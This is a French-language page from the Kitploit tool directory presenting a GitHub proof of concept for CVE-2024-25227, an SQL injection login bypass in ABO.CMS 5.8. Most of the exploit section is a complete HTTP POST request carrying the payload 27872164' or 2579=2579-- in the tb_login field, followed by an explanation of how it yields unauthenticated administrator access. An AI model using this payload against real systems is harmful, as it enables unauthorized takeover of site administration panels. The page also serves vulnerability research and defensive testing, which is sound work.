Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227 — Exploit d'injection SQL pour ABO.CMS 5.8 qui contourne l'authentification via le paramètre tb_login, accordant un accès non authentifié au panneau d'administration. Inclut une requête HTTP PoC avec payload. | Kitploit
Outils/GitHubGitHub/thetrueartist/abo.cms-exploit-unauthenticated-login-bypass-cve-2024-25227
Authentification et AutorisationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubthetrueartist/abo.cms-exploit-unauthenticated-login-bypass-cve-2024-25227

ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227

Exploit d'injection SQL pour ABO.CMS 5.8 qui contourne l'authentification via le paramètre tb_login, accordant un accès non authentifié au panneau d'administration. Inclut une requête HTTP PoC avec payload.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
4il y a 2 ansPas encore vérifié
Partager

ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227

CVE-2024-25227 Exploit

CVE-2024-25227 est une vulnérabilité SQLi dans ABO.CMS 5.8 trouvée dans le paramètre 'tb_login'

PoC:

root@kitploit:~
POST /login.aspx HTTP/1.1

Host: localhost

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/535.36 (KHTML, like Gecko) Chrome/104.0.5735.134 Safari/527.36

Connection: close

Cache-Control: max-age=0

Cookie: ASP.NET_SessionId=asd123hstjj

Origin: http://localhost

Upgrade-Insecure-Requests: 1

Referer: http://ip

Content-Type: application/x-www-form-urlencoded

Content-Length: 100

VIEWSTATE=%2ASDkjdkjfkgajsslfk&EVENTVALIDATION=%2;llkfopkorjaeitjru123&tb_login=27872164'%20or%202579%3d2579--%20&tb_pwd=hf%36nb4u%84X5&b_submit=+%C3+%D7+%CE+%C5+

Détails

La charge utile est tb_login=27872164'%20or%202579%3d2579--%20, ce qui sans encodage URL est : 27872164' or 2579=2579--

Avec la requête modifiée contenant la charge utile, vous dites au backend que le placeholder '27872164'' est combiné avec une condition qui est toujours vraie ('2579=2579'), et de commenter le reste de la requête avec '--' pour garantir que la requête modifiée soit injectée.

Cela contourne efficacement tous les contrôles d'authentification liés au champ 'tb_login', permettant un accès non authentifié au panneau de contrôle en tant qu'administrateur.

Télécharger l’outil